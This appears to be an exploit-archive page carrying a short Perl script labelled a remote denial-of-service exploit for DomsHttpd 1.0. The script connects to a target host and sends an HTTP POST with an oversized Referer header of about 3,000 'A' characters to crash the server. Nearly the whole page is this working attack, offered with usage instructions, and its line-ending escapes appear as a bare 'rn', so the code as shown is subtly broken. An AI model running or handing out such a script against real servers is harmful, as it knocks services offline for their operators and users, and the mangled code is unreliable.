[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DomsHttpd <= 1.0 Remote Denial Of Service Exploit
# Published : 2012-07-16
# Author :
# Previous Title : Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability
# Next Title : PHP 6.0 openssl_verify() Local Buffer Overflow PoC


#!/usr/bin/perl

# DomsHttpd 1.0 <= Remote Denial Of Service Exploit

# Credit: Jean Pascal Pereira <pereira@secbiz.de>

# Usage: domshttpd.pl [host] [port]

use strict;
use warnings;
use IO::Socket;

my $host = shift || "localhost";
my $port = shift || 88;

my $sock = IO::Socket::INET->new( Proto => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => $port
);


my $junk = "A"x3047;

print $sock "POST / HTTP/1.1rnHost: ".$host."rnConnection: closernUser-Agent: MozillarnReferer: http://".$host."/".$junk."rnrn";

sleep 4;

close($sock);